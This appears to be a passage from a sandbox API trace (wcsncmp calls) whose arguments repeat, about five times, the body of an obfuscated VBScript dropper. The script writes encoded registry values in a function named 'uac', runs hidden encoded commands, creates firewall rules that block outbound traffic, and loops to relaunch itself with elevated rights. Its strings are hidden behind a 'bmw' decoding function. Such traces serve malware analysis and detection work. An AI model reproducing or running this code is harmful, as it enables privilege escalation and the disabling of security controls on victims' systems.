newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0223.017] wcsncmp (_String1="IDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0223.017] wcsncmp (_String1="DHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.017] wcsncmp (_String1="HDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0223.017] wcsncmp (_String1="DYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.017] wcsncmp (_String1="YDTFEEUEN\"))\r\nnewRule.Name = 